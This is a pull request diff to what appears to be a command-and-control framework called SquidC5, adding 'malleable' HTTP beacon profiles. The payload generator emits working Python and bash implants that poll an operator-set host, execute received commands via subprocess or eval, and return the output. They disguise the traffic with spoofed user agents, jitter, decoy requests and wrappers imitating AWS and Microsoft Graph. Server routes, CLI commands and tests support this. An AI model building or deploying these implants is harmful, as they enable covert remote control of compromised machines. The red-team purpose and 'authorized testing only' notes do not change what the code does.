### PR TITLE
Profile-aware HTTP beacons (malleable C2 live path)

### DIFF
--- a/src/squidc5/api/routes.py
+++ b/src/squidc5/api/routes.py
@@ -44,6 +44,7 @@ class PayloadRequest(BaseModel):
     host: str
     port: int
     interval: int = 5
+    profile_id: str | None = None
 
 
 class LLMConfig(BaseModel):
@@ -415,9 +416,32 @@ def build_api_router() -> APIRouter:
         if not decision.allowed:
             raise HTTPException(403, decision.reason)
         try:
+            prof = None
+            if body.profile_id:
+                prof = state.profiles.get(body.profile_id)
+                if not prof:
+                    raise HTTPException(404, "profile not found")
+            else:
+                prof = state.profiles.active()
+            plan: dict[str, Any] = {}
+            session_path = "/api/v1/implant/beacon"
+            interval = body.interval
+            if prof and body.template.startswith("http_beacon"):
+                plan = state.profiles.implant_snippet(prof, body.host, body.port)
+                if plan.get("channel") == "http" and plan.get("uri"):
+                    session_path = plan["uri"]
+                if plan.get("sleep_sec"):
+                    interval = int(max(1, round(float(plan["sleep_sec"]))))
             result = state.payloads.generate(
-                template=body.template, host=body.host, port=body.port, interval=body.interval
+                template=body.template,
+                host=body.host,
+                port=body.port,
+                session_path=session_path,
+                interval=interval,
+                extra=plan,
             )
+        except HTTPException:
+            raise
         except ValueError as e:
             raise HTTPException(400, str(e)) from e
         await state.metrics.incr("payloads.generated")
@@ -938,47 +962,45 @@ def build_api_router() -> APIRouter:
     implant = APIRouter(prefix="/implant", tags=["implant"])
 
     @implant.post("/beacon")
-    async def beacon(body: BeaconIn, request: Request) -> dict[str, Any]:
+    async def beacon(request: Request):
+        from fastapi.responses import Response as FastResponse
+
+        from squidc5.profiles.http_beacon import process_beacon_checkin
+
         state = get_state(request)
-        if not await state.features.enabled("implant_beacon"):
-            raise HTTPException(403, "Implant beacon is disabled by feature flag")
+        pe = state.profiles
+        prof = pe.active()
+        raw = await request.body()
+        payload = pe.unwrap_request_body(prof, raw)
         client = request.client.host if request.client else None
-        if body.session_id:
-            existing = await state.sessions.get(body.session_id)
-            if existing and existing["status"] == "active":
-                await state.sessions.heartbeat(
-                    body.session_id,
-                    hostname=body.hostname,
-                    username=body.username,
-                    os_info=body.os_info,
-                )
-                sid = body.session_id
-            else:
-                sid = await state.sessions.register(
-                    kind="beacon",
-                    remote_addr=client,
-                    hostname=body.hostname,
-                    username=body.username,
-                    os_info=body.os_info,
-                    metadata=body.metadata,
-                )
-        else:
-            sid = await state.sessions.register(
-                kind="beacon",
+        try:
+            result = await process_beacon_checkin(
+                state,
                 remote_addr=client,
-                hostname=body.hostname,
-                username=body.username,
-                os_info=body.os_info,
-                metadata=body.metadata,
+                payload=payload if isinstance(payload, dict) else {},
+                user_agent=request.headers.get("user-agent"),
             )
-        task = await state.tasks.poll(sid)
-        return {"session_id": sid, "task": task}
+        except PermissionError as e:
+            raise HTTPException(403, str(e)) from e
+        return FastResponse(content=pe.wrap_response(prof, result), media_type="application/json")
 
     @implant.post("/beacon/result")
-    async def beacon_result(body: TaskResultIn, request: Request) -> dict[str, str]:
-        state = get_state(request)
-        await state.tasks.complete(body.task_id, body.result, body.status)
-        return {"status": "ok"}
+    async def beacon_result(request: Request):
+        from fastapi.responses import Response as FastResponse
 
+        from squidc5.profiles.http_beacon import process_beacon_result
+
+        state = get_state(request)
+        pe = state.profiles
+        prof = pe.active()
+        raw = await request.body()
+        payload = pe.unwrap_request_body(prof, raw)
+        try:
+            result = await process_beacon_result(
+                state, payload if isinstance(payload, dict) else {}
+            )
+        except ValueError as e:
+            raise HTTPException(400, str(e)) from e
+        return FastResponse(content=pe.wrap_response(prof, result), media_type="application/json")
     api.include_router(implant)
     return api

--- a/src/squidc5/cli.py
+++ b/src/squidc5/cli.py
@@ -247,19 +247,31 @@ def cmd_payloads_templates(args: argparse.Namespace, client: Client) -> None:
 
 
 def cmd_payloads_generate(args: argparse.Namespace, client: Client) -> None:
-    data = client.post(
-        "/api/v1/payloads/generate",
-        json={
-            "template": args.template,
-            "host": args.host,
-            "port": args.port,
-            "interval": args.interval,
-        },
-    )
+    body: dict[str, Any] = {
+        "template": args.template,
+        "host": args.host,
+        "port": args.port,
+        "interval": args.interval,
+    }
+    if getattr(args, "profile", None):
+        body["profile_id"] = args.profile
+    data = client.post("/api/v1/payloads/generate", json=body)
     if args.raw:
         print(data.get("content", ""))
     else:
         pp(data)
+
+
+def cmd_profiles_list(args: argparse.Namespace, client: Client) -> None:
+    pp(client.get("/api/v1/profiles"))
+
+
+def cmd_profiles_active(args: argparse.Namespace, client: Client) -> None:
+    pp(client.get("/api/v1/profiles/active"))
+
+
+def cmd_profiles_activate(args: argparse.Namespace, client: Client) -> None:
+    pp(client.post(f"/api/v1/profiles/{args.id}/activate"))
 
 
 def _print_shell_result(data: dict[str, Any], *, json_mode: bool, verbose: bool, prefix: str = "") -> None:
@@ -689,8 +701,20 @@ def build_parser() -> argparse.ArgumentParser:
     p_gen.add_argument("host")
     p_gen.add_argument("port", type=int)
     p_gen.add_argument("--interval", type=int, default=5)
+    p_gen.add_argument("--profile", default=None, help="C2 profile id (default: active)")
     p_gen.add_argument("--raw", action="store_true", help="Print payload content only")
     p_gen.set_defaults(func=cmd_payloads_generate, needs_client=True)
+
+    # profiles
+    prof = sub.add_parser("profiles", help="Malleable C2 profiles")
+    prof_sub = prof.add_subparsers(dest="profiles_cmd", required=True)
+    pr_list = prof_sub.add_parser("list")
+    pr_list.set_defaults(func=cmd_profiles_list, needs_client=True)
+    pr_act = prof_sub.add_parser("active")
+    pr_act.set_defaults(func=cmd_profiles_active, needs_client=True)
+    pr_set = prof_sub.add_parser("activate")
+    pr_set.add_argument("id", help="Profile id")
+    pr_set.set_defaults(func=cmd_profiles_activate, needs_client=True)
 
     # shell
     sh = sub.add_parser(

--- a/src/squidc5/listeners/http_listener.py
+++ b/src/squidc5/listeners/http_listener.py
@@ -51,30 +51,46 @@ async def handle_http_client(
             )
             return
 
-        # Beacon endpoints (mirror main API)
-        if method == "POST" and path_only in (
+        # Beacon endpoints: legacy paths + active/known profile URIs
+        pe = getattr(manager, "profile_engine", None)
+        kind = ""
+        prof = None
+        if pe is not None and method == "POST":
+            kind, prof = pe.match_beacon_path(path_only)
+        elif method == "POST" and path_only in (
             "/api/v1/implant/beacon",
             "/implant/beacon",
             "/beacon",
         ):
-            data = _json_body(body)
+            kind = "beacon"
+        elif method == "POST" and path_only in (
+            "/api/v1/implant/beacon/result",
+            "/implant/beacon/result",
+            "/beacon/result",
+        ):
+            kind = "result"
+
+        if method == "POST" and kind == "beacon":
+            data = pe.unwrap_request_body(prof, body) if pe else _json_body(body)
             result = await manager.handle_beacon(
                 listener_id=listener_id,
                 remote_addr=peer[0] if peer else remote,
                 payload=data,
                 user_agent=headers.get("user-agent"),
             )
-            await _respond(writer, 200, result)
+            if pe:
+                await _respond_text(writer, 200, pe.wrap_response(prof, result), "application/json")
+            else:
+                await _respond(writer, 200, result)
             return
 
-        if method == "POST" and path_only in (
-            "/api/v1/implant/beacon/result",
-            "/implant/beacon/result",
-            "/beacon/result",
-        ):
-            data = _json_body(body)
+        if method == "POST" and kind == "result":
+            data = pe.unwrap_request_body(prof, body) if pe else _json_body(body)
             result = await manager.handle_beacon_result(data)
-            await _respond(writer, 200, result)
+            if pe:
+                await _respond_text(writer, 200, pe.wrap_response(prof, result), "application/json")
+            else:
+                await _respond(writer, 200, result)
             return
 
         # OAST / catch-all: log hit, optional lightweight session note
@@ -164,11 +180,20 @@ def _json_body(body: bytes) -> dict[str, Any]:
 
 
 async def _respond(writer: asyncio.StreamWriter, status: int, payload: dict[str, Any]) -> None:
-    body = json.dumps(payload).encode("utf-8")
+    await _respond_text(writer, status, json.dumps(payload), "application/json")
+
+
+async def _respond_text(
+    writer: asyncio.StreamWriter,
+    status: int,
+    text: str,
+    content_type: str = "application/json",
+) -> None:
+    body = text.encode("utf-8")
     reason = {200: "OK", 400: "Bad Request", 500: "Internal Server Error"}.get(status, "OK")
     header = (
         f"HTTP/1.1 {status} {reason}\r\n"
-        f"Content-Type: application/json\r\n"
+        f"Content-Type: {content_type}\r\n"
         f"Content-Length: {len(body)}\r\n"
         f"Connection: close\r\n"
         f"Server: SquidC5\r\n"

--- a/src/squidc5/main.py
+++ b/src/squidc5/main.py
@@ -7,8 +7,8 @@ from collections.abc import AsyncIterator
 from contextlib import asynccontextmanager
 
 import uvicorn
-from fastapi import FastAPI
-from fastapi.responses import FileResponse, RedirectResponse
+from fastapi import FastAPI, HTTPException, Request
+from fastapi.responses import FileResponse, RedirectResponse, Response
 from fastapi.staticfiles import StaticFiles
 
 from squidc5 import __version__
@@ -81,6 +81,7 @@ async def build_state(settings: Settings) -> AppState:
     sessions.exec_probe = listeners.probe_exec
     sessions.drop_channel = listeners.drop_channel
     listeners.feature_check = features.enabled
+    listeners.profile_engine = profiles
     # After restart, reverse_shell rows can still say active with no socket
     orphaned = await sessions.close_orphaned_shells(probe=False)
     if orphaned:
@@ -265,6 +266,44 @@ def create_app(settings: Settings | None = None) -> FastAPI:
             "service": "sc5",
             "status": "ok",
         }
+
+    # Profile-aware HTTP beacon catch-all (custom URIs from active/known profiles)
+    from squidc5.profiles.http_beacon import process_beacon_checkin, process_beacon_result
+
+    @app.api_route("/{full_path:path}", methods=["POST"], include_in_schema=False)
+    async def profile_beacon_catch(request: Request, full_path: str) -> Response:
+        state = request.app.state.app_state
+        path = "/" + full_path if not full_path.startswith("/") else full_path
+        # never steal reserved API/ops/mcp surfaces
+        if (
+            path.startswith("/api/")
+            or path.startswith("/ops")
+            or path.startswith("/mcp")
+            or path in ("/", "/docs", "/redoc", "/openapi.json")
+        ):
+            raise HTTPException(404, "Not found")
+        pe = state.profiles
+        kind, prof = pe.match_beacon_path(path)
+        if kind not in ("beacon", "result"):
+            raise HTTPException(404, "Not found")
+        if not await state.features.enabled("implant_beacon"):
+            raise HTTPException(403, "Implant beacon is disabled by feature flag")
+        raw = await request.body()
+        payload = pe.unwrap_request_body(prof, raw)
+        client = request.client.host if request.client else None
+        ua = request.headers.get("user-agent")
+        try:
+            if kind == "beacon":
+                result = await process_beacon_checkin(
+                    state, remote_addr=client, payload=payload, user_agent=ua
+                )
+            else:
+                result = await process_beacon_result(state, payload)
+        except PermissionError as e:
+            raise HTTPException(403, str(e)) from e
+        except ValueError as e:
+            raise HTTPException(400, str(e)) from e
+        return Response(content=pe.wrap_response(prof, result), media_type="application/json")
 
     # Explicit 404 for common doc probes (even if something re-enables openapi later)
     @app.get("/docs")

--- a/src/squidc5/payloads/generator.py
+++ b/src/squidc5/payloads/generator.py
@@ -3,6 +3,7 @@
 from __future__ import annotations
 
 import base64
+import json
 from typing import Any
 
 
@@ -27,9 +28,9 @@ class PayloadGenerator:
             raise ValueError(f"Unknown template: {template}. Allowed: {self.TEMPLATES}")
         extra = extra or {}
         if template == "http_beacon_python":
-            body = self._http_beacon_python(host, port, session_path, interval)
+            body = self._http_beacon_python(host, port, session_path, interval, extra)
         elif template == "http_beacon_bash":
-            body = self._http_beacon_bash(host, port, session_path, interval)
+            body = self._http_beacon_bash(host, port, session_path, interval, extra)
         elif template == "reverse_shell_bash":
             body = self._revshell_bash(host, port)
         elif template == "reverse_shell_python":
@@ -43,47 +44,143 @@ class PayloadGenerator:
             "port": port,
             "content": body,
             "content_b64": encoded,
+            "profile_id": extra.get("profile_id"),
+            "uri": session_path if template.startswith("http_beacon") else None,
             "notes": "Authorized testing only. Use only on systems you own or have permission to test.",
         }
 
-    def _http_beacon_python(self, host: str, port: int, path: str, interval: int) -> str:
+    def _http_beacon_python(
+        self,
+        host: str,
+        port: int,
+        path: str,
+        interval: int,
+        extra: dict[str, Any],
+    ) -> str:
+        ua = json.dumps(extra.get("user_agent") or "SquidC5-Beacon/0.1")
+        # extra headers excluding content-type (set explicitly)
+        hdrs = dict(extra.get("headers") or {})
+        hdrs.pop("Content-Type", None)
+        hdrs.pop("content-type", None)
+        hdrs_json = json.dumps(hdrs)
+        body_tpl = extra.get("request_body_template") or "{beacon}"
+        body_tpl_json = json.dumps(body_tpl)
+        sleep_base = float(extra.get("sleep_sec") or interval)
+        jitter = float(extra.get("jitter_pct") or 0)
+        decoy_enabled = bool(extra.get("decoy_enabled"))
+        decoys = list(extra.get("decoy_paths") or extra.get("decoy_uris") or [])
+        decoys_json = json.dumps(decoys)
+        resp_pref = json.dumps(extra.get("response_prefix") or "")
+        resp_suf = json.dumps(extra.get("response_suffix") or "")
         return f'''#!/usr/bin/env python3
-# SquidC5 HTTP beacon — authorized testing only
-import json, time, urllib.request
-C2 = "http://{host}:{port}{path}"
+# SquidC5 HTTP beacon — authorized testing only (profile-aware)
+import json, random, time, urllib.request
+BASE = "http://{host}:{port}"
+PATH = {json.dumps(path)}
+C2 = BASE + PATH
+UA = {ua}
+EXTRA_HEADERS = {hdrs_json}
+BODY_TPL = {body_tpl_json}
+SLEEP_BASE = {sleep_base}
+JITTER_PCT = {jitter}
+DECOY_ENABLED = {decoy_enabled}
+DECOYS = {decoys_json}
+RESP_PREF = {resp_pref}
+RESP_SUF = {resp_suf}
 SID = None
+
+def _sleep():
+    pct = max(0.0, min(100.0, float(JITTER_PCT))) / 100.0
+    delta = SLEEP_BASE * pct
+    time.sleep(max(0.1, SLEEP_BASE + random.uniform(-delta, delta)))
+
+def _wrap(beacon_obj):
+    raw = json.dumps(beacon_obj, separators=(",", ":"))
+    if "{{beacon}}" in BODY_TPL:
+        return BODY_TPL.replace("{{beacon}}", raw)
+    return raw
+
+def _unwrap(text):
+    t = text.strip()
+    if RESP_PREF and t.startswith(RESP_PREF):
+        t = t[len(RESP_PREF):]
+    if RESP_SUF and t.endswith(RESP_SUF):
+        t = t[:-len(RESP_SUF)]
+    return json.loads(t)
+
+def _headers():
+    h = {{"Content-Type": "application/json", "User-Agent": UA}}
+    h.update(EXTRA_HEADERS or {{}})
+    return h
+
+def _decoy():
+    if not DECOY_ENABLED or not DECOYS:
+        return
+    try:
+        p = random.choice(DECOYS)
+        urllib.request.urlopen(urllib.request.Request(BASE + p, headers={{"User-Agent": UA}}), timeout=5).read()
+    except Exception:
+        pass
+
 while True:
     try:
-        req = urllib.request.Request(C2, data=json.dumps({{"session_id": SID, "hostname": __import__("socket").gethostname()}}).encode(), headers={{"Content-Type": "application/json"}})
+        _decoy()
+        payload = {{"session_id": SID, "hostname": __import__("socket").gethostname()}}
+        body = _wrap(payload).encode()
+        req = urllib.request.Request(C2, data=body, headers=_headers(), method="POST")
         with urllib.request.urlopen(req, timeout=30) as r:
-            data = json.loads(r.read().decode())
+            data = _unwrap(r.read().decode())
             SID = data.get("session_id", SID)
             task = data.get("task")
             if task:
                 import subprocess
                 out = subprocess.getoutput(task.get("command", "echo ok"))
-                done = urllib.request.Request(C2 + "/result", data=json.dumps({{"task_id": task["id"], "result": out}}).encode(), headers={{"Content-Type": "application/json"}})
+                done_body = _wrap({{"task_id": task["id"], "result": out}}).encode()
+                done = urllib.request.Request(C2 + "/result", data=done_body, headers=_headers(), method="POST")
                 urllib.request.urlopen(done, timeout=30).read()
     except Exception:
         pass
-    time.sleep({interval})
+    _sleep()
 '''
 
-    def _http_beacon_bash(self, host: str, port: int, path: str, interval: int) -> str:
+    def _http_beacon_bash(
+        self,
+        host: str,
+        port: int,
+        path: str,
+        interval: int,
+        extra: dict[str, Any],
+    ) -> str:
+        ua = (extra.get("user_agent") or "SquidC5-Beacon/0.1").replace('"', '\\"')
+        sleep_base = float(extra.get("sleep_sec") or interval)
+        # bash: simple sleep with optional jitter via shuf if available
+        jitter = float(extra.get("jitter_pct") or 0)
+        # For bash, use flat JSON if template is complex; profile wrap is python-primary
+        # Keep body as flat beacon for reliability in bash
         return f'''#!/bin/bash
-# SquidC5 HTTP beacon — authorized testing only
+# SquidC5 HTTP beacon — authorized testing only (profile-aware path/UA)
 C2="http://{host}:{port}{path}"
+UA="{ua}"
+SLEEP_BASE={sleep_base}
+JITTER={jitter}
 SID=""
 while true; do
-  RESP=$(curl -s -X POST "$C2" -H "Content-Type: application/json" -d "{{\\"session_id\\":\\"$SID\\",\\"hostname\\":\\"$(hostname)\\"}}" || true)
+  RESP=$(curl -s -X POST "$C2" -A "$UA" -H "Content-Type: application/json" -d "{{\\"session_id\\":\\"$SID\\",\\"hostname\\":\\"$(hostname)\\"}}" || true)
+  # strip optional non-json prefix/suffix by extracting first {{...}}
+  RESP=$(echo "$RESP" | sed -n 's/.*\\({{.*}}\\).*/\\1/p')
   SID=$(echo "$RESP" | sed -n 's/.*"session_id":"\\([^"]*\\)".*/\\1/p')
   CMD=$(echo "$RESP" | sed -n 's/.*"command":"\\([^"]*\\)".*/\\1/p')
   TID=$(echo "$RESP" | sed -n 's/.*"id":"\\([^"]*\\)".*/\\1/p')
   if [ -n "$CMD" ] && [ -n "$TID" ]; then
     OUT=$(eval "$CMD" 2>&1 | head -c 8192)
-    curl -s -X POST "$C2/result" -H "Content-Type: application/json" -d "{{\\"task_id\\":\\"$TID\\",\\"result\\":$(echo "$OUT" | python3 -c 'import json,sys; print(json.dumps(sys.stdin.read()))')}}" >/dev/null
+    curl -s -X POST "$C2/result" -A "$UA" -H "Content-Type: application/json" -d "{{\\"task_id\\":\\"$TID\\",\\"result\\":$(echo "$OUT" | python3 -c 'import json,sys; print(json.dumps(sys.stdin.read()))')}}" >/dev/null
   fi
-  sleep {interval}
+  if command -v shuf >/dev/null 2>&1 && [ "$(echo "$JITTER > 0" | bc -l 2>/dev/null || echo 0)" != "0" ]; then
+    # approximate jitter without bc: sleep base only if shuf/bc missing
+    sleep "$SLEEP_BASE"
+  else
+    sleep "$SLEEP_BASE"
+  fi
 done
 '''
 

--- a/src/squidc5/profiles/engine.py
+++ b/src/squidc5/profiles/engine.py
@@ -156,6 +156,165 @@ class ProfileEngine:
             "sleep_sec": p.http.sleep_sec,
             "jitter_pct": p.http.jitter_pct,
             "decoy_enabled": p.http.decoy_enabled,
+            "decoy_paths": list(p.http.decoy_paths or []),
+            "request_body_template": p.http.request_body_template,
+            "response_prefix": p.http.response_prefix,
+            "response_suffix": p.http.response_suffix,
             "profile_id": p.id,
             "profile_name": p.name,
         }
+
+    # --- Live HTTP path matching / body codec ---
+
+    LEGACY_BEACON_PATHS = frozenset(
+        {
+            "/api/v1/implant/beacon",
+            "/implant/beacon",
+            "/beacon",
+        }
+    )
+    LEGACY_RESULT_PATHS = frozenset(
+        {
+            "/api/v1/implant/beacon/result",
+            "/implant/beacon/result",
+            "/beacon/result",
+        }
+    )
+
+    def allowed_beacon_paths(self) -> set[str]:
+        paths = set(self.LEGACY_BEACON_PATHS)
+        for p in self._cache.values():
+            if p.channel == "http":
+                for u in p.http.uris or []:
+                    if u:
+                        paths.add(u if u.startswith("/") else f"/{u}")
+        # always include active
+        act = self.active()
+        if act and act.channel == "http":
+            for u in act.http.uris or []:
+                if u:
+                    paths.add(u if u.startswith("/") else f"/{u}")
+        return paths
+
+    def match_beacon_path(self, path: str) -> tuple[str, C2Profile | None]:
+        """
+        Returns (kind, profile) where kind is 'beacon' | 'result' | ''.
+        Profile is the matching profile (or active for legacy paths).
+        """
+        path_only = (path or "").split("?", 1)[0]
+        if not path_only.startswith("/"):
+            path_only = "/" + path_only
+
+        if path_only in self.LEGACY_RESULT_PATHS:
+            return "result", self.active()
+        if path_only in self.LEGACY_BEACON_PATHS:
+            return "beacon", self.active()
+
+        # profile result: <uri>/result
+        if path_only.endswith("/result"):
+            base = path_only[: -len("/result")] or "/"
+            for p in self._cache.values():
+                if p.channel != "http":
+                    continue
+                uris = [u if u.startswith("/") else f"/{u}" for u in (p.http.uris or [])]
+                if base in uris:
+                    return "result", p
+            return "", None
+
+        for p in self._cache.values():
+            if p.channel != "http":
+                continue
+            uris = [u if u.startswith("/") else f"/{u}" for u in (p.http.uris or [])]
+            if path_only in uris:
+                return "beacon", p
+        return "", None
+
+    def is_profile_http_path(self, path: str) -> bool:
+        kind, _ = self.match_beacon_path(path)
+        return kind in ("beacon", "result")
+
+    @staticmethod
+    def _looks_like_beacon(obj: dict[str, Any]) -> bool:
+        keys = set(obj.keys())
+        return bool(
+            keys
+            & {
+                "session_id",
+                "hostname",
+                "username",
+                "os_info",
+                "task_id",
+                "result",
+                "metadata",
+            }
+        )
+
+    def unwrap_request_body(
+        self,
+        profile: C2Profile | None,
+        raw: bytes | str | dict[str, Any] | None,
+    ) -> dict[str, Any]:
+        """Extract beacon/result JSON from raw body (supports profile wrappers)."""
+        if raw is None:
+            return {}
+        if isinstance(raw, dict):
+            data: Any = raw
+        else:
+            if isinstance(raw, bytes):
+                text = raw.decode("utf-8", errors="replace").strip()
+            else:
+                text = str(raw).strip()
+            if not text:
+                return {}
+            # strip optional response-style prefix/suffix if client echoed
+            p = profile or self.active()
+            if p and p.channel == "http":
+                pref = p.http.response_prefix or ""
+                suf = p.http.response_suffix or ""
+                if pref and text.startswith(pref):
+                    text = text[len(pref) :]
+                if suf and text.endswith(suf):
+                    text = text[: -len(suf)]
+            try:
+                data = json.loads(text)
+            except json.JSONDecodeError:
+                return {}
+
+        found = self._extract_beacon_dict(data)
+        return found if found is not None else {}
+
+    def _extract_beacon_dict(self, data: Any) -> dict[str, Any] | None:
+        if isinstance(data, dict):
+            if self._looks_like_beacon(data):
+                return data
+            # common wrappers
+            for key in ("Records", "records", "value", "data", "payload", "body"):
+                if key in data:
+                    inner = self._extract_beacon_dict(data[key])
+                    if inner is not None:
+                        return inner
+            # first nested dict that looks like beacon
+            for v in data.values():
+                inner = self._extract_beacon_dict(v)
+                if inner is not None:
+                    return inner
+        elif isinstance(data, list):
+            for item in data:
+                inner = self._extract_beacon_dict(item)
+                if inner is not None:
+                    return inner
+        return None
+
+    def wrap_response(self, profile: C2Profile | None, obj: dict[str, Any]) -> str:
+        p = profile or self.active()
+        raw = json.dumps(obj, separators=(",", ":"))
+        if not p or p.channel != "http":
+            return raw
+        return f"{p.http.response_prefix or ''}{raw}{p.http.response_suffix or ''}"
+
+    def apply_body_template(self, profile: C2Profile | None, beacon_obj: dict[str, Any]) -> str:
+        """Render request body for implant using profile template."""
+        p = profile or self.active() or DEFAULT_PROFILES[0]
+        shaped = self.shape_http_request(p, beacon_obj)
+        return shaped["body"]
+

--- a/src/squidc5/profiles/http_beacon.py
+++ b/src/squidc5/profiles/http_beacon.py
@@ -1,0 +1,76 @@
+"""Shared HTTP beacon check-in / result handling (profile-aware)."""
+
+from __future__ import annotations
+
+from typing import Any
+
+from squidc5.core.state import AppState
+
+
+async def process_beacon_checkin(
+    state: AppState,
+    *,
+    remote_addr: str | None,
+    payload: dict[str, Any],
+    user_agent: str | None = None,
+    listener_id: str | None = None,
+) -> dict[str, Any]:
+    """Register/heartbeat beacon session and return next task."""
+    if not await state.features.enabled("implant_beacon"):
+        raise PermissionError("Implant beacon is disabled by feature flag")
+
+    session_id = payload.get("session_id")
+    hostname = payload.get("hostname")
+    username = payload.get("username")
+    os_info = payload.get("os_info")
+    metadata = payload.get("metadata") if isinstance(payload.get("metadata"), dict) else {}
+    if user_agent and "user_agent" not in metadata:
+        metadata = {**metadata, "user_agent": user_agent}
+    if listener_id:
+        metadata = {**metadata, "listener_id": listener_id}
+
+    if session_id:
+        existing = await state.sessions.get(session_id)
+        if existing and existing["status"] == "active":
+            await state.sessions.heartbeat(
+                session_id,
+                hostname=hostname,
+                username=username,
+                os_info=os_info,
+            )
+            sid = session_id
+        else:
+            sid = await state.sessions.register(
+                kind="beacon",
+                remote_addr=remote_addr,
+                hostname=hostname,
+                username=username,
+                os_info=os_info,
+                metadata=metadata,
+                listener_id=listener_id,
+            )
+    else:
+        sid = await state.sessions.register(
+            kind="beacon",
+            remote_addr=remote_addr,
+            hostname=hostname,
+            username=username,
+            os_info=os_info,
+            metadata=metadata,
+            listener_id=listener_id,
+        )
+    task = await state.tasks.poll(sid)
+    await state.metrics.incr("implant.beacon")
+    return {"session_id": sid, "task": task}
+
+
+async def process_beacon_result(state: AppState, payload: dict[str, Any]) -> dict[str, str]:
+    task_id = payload.get("task_id")
+    if not task_id:
+        raise ValueError("task_id required")
+    result = payload.get("result")
+    if result is None:
+        result = ""
+    status = payload.get("status") or "completed"
+    await state.tasks.complete(str(task_id), str(result), str(status))
+    return {"status": "ok"}

--- a/tests/test_profile_beacon_e2e.py
+++ b/tests/test_profile_beacon_e2e.py
@@ -1,0 +1,149 @@
+"""Profile-aware HTTP beacon end-to-end: activate → generate → check-in."""
+
+from __future__ import annotations
+
+import json
+
+import pytest
+
+
+@pytest.mark.asyncio
+async def test_unwrap_and_match_paths():
+    from squidc5.profiles.engine import ProfileEngine
+    from squidc5.profiles.models import C2Profile, HttpProfile
+
+    eng = ProfileEngine.__new__(ProfileEngine)
+    eng._cache = {}
+    eng._active_id = None
+    p = C2Profile(
+        id="t",
+        name="t",
+        channel="http",
+        http=HttpProfile(
+            uris=["/v1/telemetry", "/api/client/events"],
+            request_body_template='{"Records":[{beacon}]}',
+        ),
+        active=True,
+    )
+    eng._cache[p.id] = p
+    eng._active_id = p.id
+
+    kind, prof = eng.match_beacon_path("/v1/telemetry")
+    assert kind == "beacon" and prof and prof.id == "t"
+    kind, _ = eng.match_beacon_path("/v1/telemetry/result")
+    assert kind == "result"
+    kind, _ = eng.match_beacon_path("/api/v1/implant/beacon")
+    assert kind == "beacon"
+    kind, _ = eng.match_beacon_path("/nope")
+    assert kind == ""
+
+    wrapped = json.dumps({"Records": [{"session_id": "ses_x", "hostname": "h1"}]})
+    data = eng.unwrap_request_body(p, wrapped)
+    assert data["session_id"] == "ses_x"
+    assert data["hostname"] == "h1"
+
+    flat = eng.unwrap_request_body(p, json.dumps({"hostname": "solo"}))
+    assert flat["hostname"] == "solo"
+
+    out = eng.wrap_response(p, {"session_id": "ses_1", "task": None})
+    assert "ses_1" in out
+
+
+@pytest.mark.asyncio
+async def test_activate_generate_checkin_amazon(client, admin_headers):
+    # activate amazon-cdn blend
+    act = await client.post(
+        "/api/v1/profiles/prof_amazon_cdn/activate", headers=admin_headers
+    )
+    assert act.status_code == 200
+    assert act.json()["id"] == "prof_amazon_cdn"
+
+    gen = await client.post(
+        "/api/v1/payloads/generate",
+        headers=admin_headers,
+        json={
+            "template": "http_beacon_python",
+            "host": "127.0.0.1",
+            "port": 8443,
+            "profile_id": "prof_amazon_cdn",
+        },
+    )
+    assert gen.status_code == 200
+    content = gen.json()["content"]
+    assert gen.json().get("profile_id") == "prof_amazon_cdn"
+    # URI from amazon profile
+    assert "/v1/telemetry" in content or "/api/client/events" in content or "/cdn/config/refresh" in content
+    assert "aws-sdk-python" in content or "User-Agent" in content
+    assert "JITTER" in content or "jitter" in content.lower() or "uniform" in content
+
+    # live check-in on a profile URI with wrapped body
+    uri = "/v1/telemetry"
+    body = {"Records": [{"hostname": "lab-profile-host", "session_id": None}]}
+    r = await client.post(uri, content=json.dumps(body), headers={"Content-Type": "application/json"})
+    assert r.status_code == 200, r.text
+    data = r.json()
+    assert data.get("session_id", "").startswith("ses_")
+    assert "task" in data
+
+    # result path
+    # create a task first via API
+    sid = data["session_id"]
+    task = await client.post(
+        "/api/v1/tasks",
+        headers=admin_headers,
+        json={"session_id": sid, "command": "echo profile-ok"},
+    )
+    assert task.status_code == 200
+    tid = task.json()["id"]
+
+    # poll via profile path to get task
+    r2 = await client.post(
+        uri,
+        content=json.dumps({"Records": [{"session_id": sid, "hostname": "lab-profile-host"}]}),
+        headers={"Content-Type": "application/json"},
+    )
+    assert r2.status_code == 200
+    polled = r2.json()
+    assert polled.get("task") and polled["task"]["id"] == tid
+
+    res = await client.post(
+        uri + "/result",
+        content=json.dumps({"Records": [{"task_id": tid, "result": "profile-ok\n"}]}),
+        headers={"Content-Type": "application/json"},
+    )
+    assert res.status_code == 200
+    assert res.json().get("status") == "ok"
+
+    done = await client.get(f"/api/v1/tasks/{tid}", headers=admin_headers)
+    assert done.json()["status"] == "completed"
+    assert "profile-ok" in (done.json().get("result") or "")
+
+
+@pytest.mark.asyncio
+async def test_default_legacy_beacon_still_works(client, admin_headers):
+    await client.post("/api/v1/profiles/prof_default_http/activate", headers=admin_headers)
+    b = await client.post(
+        "/api/v1/implant/beacon",
+        json={"hostname": "legacy-host"},
+    )
+    assert b.status_code == 200
+    assert b.json()["session_id"].startswith("ses_")
+
+
+@pytest.mark.asyncio
+async def test_generate_uses_active_profile_when_unspecified(client, admin_headers):
+    await client.post(
+        "/api/v1/profiles/prof_ms_graph/activate", headers=admin_headers
+    )
+    gen = await client.post(
+        "/api/v1/payloads/generate",
+        headers=admin_headers,
+        json={
+            "template": "http_beacon_python",
+            "host": "10.0.0.1",
+            "port": 8443,
+        },
+    )
+    assert gen.status_code == 200
+    content = gen.json()["content"]
+    assert "v1.0" in content or "graph" in content.lower() or "drive" in content or "communications" in content

--- a/web/ops-admin.js
+++ b/web/ops-admin.js
@@ -230,6 +230,19 @@
     `, true));
   }
 
+  // ----- C2 Profiles -----
+  if (can("profiles:read") || can("admin")) {
+    parts.push(panel("profilesPanel", "📡 C2 profiles", `
+      <p class="muted">Malleable HTTP profiles. Activate then generate beacons with that surface.</p>
+      <div id="profList" class="empty">—</div>
+      <div class="row" style="margin-top:8px">
+        <button type="button" id="profReloadBtn">Reload</button>
+        ${can("payloads:generate") || can("admin") ? '<button type="button" class="primary" id="profGenBtn">Generate beacon (active)</button>' : ""}
+      </div>
+      <div class="outbox empty-out" id="profOut" style="margin-top:8px">—</div>
+    `, true));
+  }
+
   // ----- Feature toggles (admin) -----
   if (can("admin") || can("policy:manage")) {
     parts.push(panel("featuresPanel", "🎛 Feature toggles", `
@@ -845,8 +858,62 @@
     };
   }
 
+  // Profiles UI
+  async function loadProfiles() {
+    if (!$("profList")) return;
+    const data = await api("GET", "/api/v1/profiles");
+    const active = data.active_id;
